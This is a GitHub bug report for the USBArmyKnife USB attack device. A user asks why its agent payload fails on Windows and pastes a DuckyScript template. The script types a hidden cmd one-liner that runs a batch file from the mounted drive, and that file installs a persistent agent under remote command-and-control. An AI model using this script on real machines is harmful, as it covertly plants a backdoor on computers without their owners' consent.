i-am-shodan/USBArmyKnife #197: Agent script - Windows do not recognize the disk partition/ Service don’t start.

sabbajohn, 2025-08-28:
## Your problem

There are two things 
First one:
Windows do not recognize the mounted partition on Agent attack. It ask to format the disk, cannot interact with the disk. 

Second:
I also try to proceed with this attack manually, entering the commands to run the agent. A cmd screen opens fast. But no service was started or even identified by the C2. No agent connected 

## Your device

```txt

LilyGo T-Dongle S3

```

# Language (HID attacks only)

I’m using PT-BR 
## Your DuckyScript

Basically the agent template but I set the layout to  PT-BR
```yaml

DEFINE #FILE /agentInstalled

REM Only install the agent if this is the first machine we've been plugged into
IF (FILE_EXISTS() == FALSE) THEN
  LOG agentInstalled file does NOT exist
  LOG Installing agent
  USB_MOUNT_DISK_READ_ONLY /agent.img

  WAIT_FOR_USB_STORAGE_ACTIVITY
  REM Make sure we leave enough time for the drive box to appear
  DELAY 5000

  REM Searches each drive for a file name in1.bat. Run it if found

  LOG Performing HID attack
  REM Open Run window
  GUI R
  DELAY 1000

  REM To run we tell the agent the VID and PID of this device. That way it knows exactly what device to talk to
  REM The interpreter injects some 'constants' like #_VID_ and #_PID_.
  REM This is to keep compatibility with DuckyScript3 but allows us to have dynamic variables we can use in our attack
  STRING cmd /c @echo off & for %d in (D E F G H) do if exist %d:\in1.bat %d:\in1.bat #_VID_ #_PID_
  ENTER
  
  LOG HID attack complete
  LOG Didnt see key presses? Check wiki for efuse instructions

  REM The script needs time from Windows to actually start
  DELAY 1000
  REM Wait for the files to be copied to the right place and a task created
  WAIT_FOR_USB_STORAGE_ACTIVITY_TO_STOP
  DELAY 1000

  REM At this point the agent will copy itself somewhere safe and rerun itself
  REM we can wait until it connects

  CREATE_FILE()

  REM By resetting we can make the USB drive go away
  RESET
END_IF

LOG Waiting for agent to respond
WHILE (AGENT_CONNECTED() == FALSE)
  DELAY 2000
END_WHILE

LOG Agent responded
REM run a command, to see the results check the log over WiFi
AGENT_RUN dir

```

## Your debug logs

```txt
I’ll be back to fulfill this. But it basically starts, check for the file. But it freezes after check the disks. As soon as I’m with my windows machine I’ll bring more details. 
```

- I confirm I have read the FAQ:I do
- I confirm I am using the latest release:I do

- My version number is: not sure not running it right now. But o can edit it later. 

## Additional information

i-am-shodan, 2025-08-28:
Sounds like you haven't created the agent disk image correctly

sabbajohn, 2025-08-31:
I'm mounting it based on the instructions on the read me. Using DD. Tried also using macOS DiskUtility GUI. And also few utilities from Windows. The img file looks great. The disk is the problem. It can open the storage device

closed 2025-09-16 by i-am-shodan